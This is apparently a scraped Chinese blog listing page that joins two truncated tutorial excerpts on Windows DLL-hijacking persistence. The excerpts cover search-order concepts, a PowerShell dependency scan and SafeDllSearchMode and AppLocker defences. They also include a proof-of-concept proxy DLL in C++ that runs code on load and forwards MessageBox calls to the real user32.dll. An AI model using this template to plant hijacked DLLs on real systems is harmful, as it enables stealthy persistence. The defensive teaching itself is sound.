DLL劫持持久化基础知识

Mon, 01 Jan 0001 00:00:00 +0000

技术介绍#

DLL劫持持久化是一种利用Windows系统DLL加载机制进行持久化攻击的技术。攻击者通过替换或伪造DLL文件，使系统在启动特定程序时加载恶意DLL，从而实现持久化访问。本教程将详细介绍DLL劫持持久化的基础知识、核心概念和技术方法，帮助安全人员理解和防御DLL劫持持久化攻击。

DLL劫持持久化核心概念#

DLL（Dynamic Link Library）：动态链接库，Windows系统中可被多个程序共享的代码库
DLL劫持（DLL Hijacking）：利用DLL加载机制进行攻击的技术
DLL搜索顺序（DLL Search Order）：Windows系统加载DLL的搜索顺序
DLL代理（DLL Proxying）：通过代理DLL进行劫持的技术
DLL重定向（DLL Redirection）：重定向DLL加载路径的技术
DLL注入（DLL Injection）：将恶意DLL注入到进程中的技术
DLL侧加载（DLL Side-Loading）：侧加载恶意DLL的技术
DLL路径劫持（DLL Path Hijacking）：劫持DLL加载路径的技术
DLL替换（DLL Replacement）：替换系统DLL的技术
持久化（Persistence）：在系统中保持长期访问的技术
启动持久化（Startup Persistence）：通过启动项实现持久化
服务持久化（Service Persistence）：通过服务实现持久化
计划任务持久化（Scheduled Task Persistence）：通过计划任务实现持久化

DLL劫持持久化的特点#

隐蔽性：DLL劫持攻击隐蔽性强
持久性：DLL劫持可以实现持久化访问
灵活性：DLL劫持技术灵活多样
依赖性：DLL劫持依赖DLL加载机制
检测难度：DLL劫持检测难度较大
影响范围：DLL劫持影响范围广

DLL劫持持久化的重要性#

攻击检测：检测DLL劫持攻击
系统加固：加固系统防止DLL劫持
安全防护：防护DLL劫持攻击
合规性：满足合规性要求
风险降低：降低安全风险
业务保护：保护业务连续性

技术体系#

DLL劫持持久化技术体系主要包括以下几个方面：

DLL劫持原理#

DLL搜索顺序：Windows系统加载DLL的搜索顺序
DLL加载机制：Windows系统加载DLL的机制
DLL劫持原理：DLL劫持的基本原理
DLL劫持类型：DLL劫持的不同类型

DLL劫持技术#

DLL代理劫持：通过代理DLL进行劫持
DLL路径劫持：劫持DLL加载路径
DLL替换劫持：替换系统DLL
DLL侧加载劫持：侧加载恶意DLL
DLL注入劫持：注入恶意DLL到进程

DLL劫持防御#

DLL签名验证：验证DLL签名
DLL路径保护：保护DLL加载路径
DLL完整性检查：检查DLL完整性
DLL白名单：使用DLL白名单
DLL黑名单：使用DLL黑名单

工具使用#

DLL劫持检测工具#

PowerShell脚本：

功能：检测DLL劫持漏洞
用途：扫描系统中的DLL劫持漏洞

使用方法：

# 使用PowerShell检测DLL劫持
# 检查可执行文件的DLL依赖
Get-ChildItem -Path "C:\Program Files" -Recurse -Include *.exe | ForEach-Object {
 $dlls = dumpbin /DEPENDENTS $_.FullName 2>$null | Select-String "\.dll$"
 if ($dlls) {
 Write-Host "$($_.FullName) depends on:"
 $dlls | ForEach-Object { Write-Host $_.Line.Trim() }
 }
}

# 检查DLL搜索路径
[System.Environment]::GetEnvironmentVariable("PATH") -split ';' | ForEach-Object {
 if (Test-Path $_) {
 Get-ChildItem -Path $_ -Filter "*.dll" | Select-Object FullName
 }
}

Process Monitor：

DLL劫持持久化技术详解

Mon, 01 Jan 0001 00:00:00 +0000

DLL劫持持久化技术详解#

技术介绍#

DLL劫持（DLL Hijacking）是一种常见的持久化技术，攻击者通过替换或伪造应用程序依赖的动态链接库（DLL），实现恶意代码的持久执行。这种技术利用了Windows系统加载DLL的搜索顺序机制，当应用程序加载DLL时，如果在搜索路径中找到恶意DLL，系统会优先加载它，从而执行恶意代码。本教程将详细介绍DLL劫持的核心概念、技术方法、防御措施和案例分析，帮助安全人员理解和防御这种持久化攻击。

DLL劫持核心概念#

动态链接库（DLL）：Windows系统中用于存储可被多个应用程序共享的代码和数据的文件
DLL搜索路径：Windows系统查找DLL的顺序，包括应用程序目录、当前目录、系统目录等
DLL劫持：通过在DLL搜索路径中放置恶意DLL，使应用程序优先加载恶意DLL
导出函数：DLL中可供其他程序调用的函数
函数转发：恶意DLL调用原始DLL的函数，保持应用程序正常运行
持久化：使恶意代码在系统重启后仍然能够执行的技术
特权提升：通过DLL劫持获取更高的系统权限
防御规避：绕过安全软件检测的技术

DLL劫持技术体系#

DLL搜索顺序劫持：利用Windows DLL搜索顺序，在应用程序搜索路径中放置恶意DLL
DLL替换：直接替换系统或应用程序的合法DLL
DLL路径劫持：修改应用程序的DLL搜索路径，指向包含恶意DLL的目录
DLL导出函数劫持：创建与合法DLL具有相同导出函数的恶意DLL
Side-loading：利用应用程序对未签名DLL的信任，加载恶意DLL
反射型DLL注入：将DLL加载到内存中执行，不写入磁盘

DLL劫持防御技术#

DLL签名验证：验证DLL的数字签名，确保其来源合法
DLL路径保护：使用SafeDllSearchMode、AppLocker等技术限制DLL搜索路径
DLL加载监控：监控应用程序的DLL加载行为，检测异常
最小权限原则：限制应用程序的权限，减少DLL劫持的影响范围
应用程序白名单：只允许运行已验证的应用程序和DLL

入门级使用#

DLL劫持基础#

了解DLL劫持的基本概念和技术：

# 1. DLL搜索顺序
# Windows系统的DLL搜索顺序（默认）：
# 1. 应用程序加载的目录
# 2. 当前工作目录
# 3. 系统目录（C:\Windows\System32）
# 4. 16位系统目录（C:\Windows\System）
# 5. Windows目录（C:\Windows）
# 6. PATH环境变量中列出的目录

# 2. 查看应用程序依赖的DLL
# 使用Dependency Walker工具
# 下载Dependency Walker：https://www.dependencywalker.com/

# 运行Dependency Walker
# 打开应用程序（如notepad.exe）
# 查看应用程序依赖的DLL

# 使用Process Explorer工具
# 下载Process Explorer：https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer

# 运行Process Explorer
# 选择应用程序进程
# 查看"DLL"选项卡，查看已加载的DLL

# 3. 基本DLL劫持演示
# 创建恶意DLL
# 使用Visual Studio创建DLL项目

// dllmain.cpp
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
 switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
 // 执行恶意代码
 MessageBox(NULL, L"DLL Hijacked!", L"Alert", MB_OK);
 break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 break;
 }
 return TRUE;
}

# 编译DLL
# 将编译后的DLL重命名为应用程序依赖的DLL名称（如user32.dll）
# 将恶意DLL复制到应用程序目录

# 运行应用程序，观察是否弹出消息框

# 4. 函数转发
# 修改DLL代码，添加函数转发，保持应用程序正常运行

// dllmain.cpp
#include <windows.h>

// 加载原始DLL
HMODULE hOriginalDll = NULL;

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
 switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
 // 执行恶意代码
 MessageBox(NULL, L"DLL Hijacked!", L"Alert", MB_OK);
 // 加载原始DLL
 hOriginalDll = LoadLibrary(L"C:\\Windows\\System32\\user32.dll");
 break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 // 卸载原始DLL
 if (hOriginalDll)
 FreeLibrary(hOriginalDll);
 break;
 }
 return TRUE;
}

// 导出函数，转发到原始DLL
extern "C" __declspec(dllexport) int WINAPI MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
{
 typedef int (WINAPI *MESSAGEBOXAFN)(HWND, LPCSTR, LPCSTR, UINT);
 MESSAGEBOXAFN pMessageBoxA = (MESSAGEBOXAFN)GetProcAddress(hOriginalDll, "MessageBoxA");
 return pMessageBoxA(hWnd, lpText, lpCaption, uType);
}

extern "C" __declspec(dllexport) int WINAPI MessageBoxW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType)
{
 typedef int (WINAPI *MESSAGEBOXWFN)(HWND, LPCWSTR, LPCWSTR, UINT);
 MESSAGEBOXWFN pMessageBoxW = (MESSAGEBOXWFN)GetProcAddress(hOriginalDll, "MessageBoxW");
 return pMessageBoxW(hWnd, lpText, lpCaption, uType);
}

# 5. DLL劫持防御基础
# 启用SafeDllSearchMode
# 查看当前设置
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode"

# 启用SafeDllSearchMode
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v SafeDllSearchMode /t REG_DWORD /d 1 /f

# 使用AppLocker限制DLL加载
# 打开本地组策略编辑器
# gpedit.msc
# 计算机配置 -> Windows设置 -> 安全设置 -> 应用程序控制策略 -> AppLocker
# 配置DLL规则

DLL劫持工具#

了解和使用DLL劫持相关工具：

DLL劫持持久化 on Linux邪修

DLL劫持持久化基础知识

技术介绍#

DLL劫持持久化核心概念#

DLL劫持持久化的特点#

DLL劫持持久化的重要性#

技术体系#

DLL劫持原理#

DLL劫持技术#

DLL劫持防御#

工具使用#

DLL劫持检测工具#

DLL劫持持久化技术详解

DLL劫持持久化技术详解#

技术介绍#

DLL劫持核心概念#

DLL劫持技术体系#

DLL劫持防御技术#

入门级使用#

DLL劫持基础#

DLL劫持工具#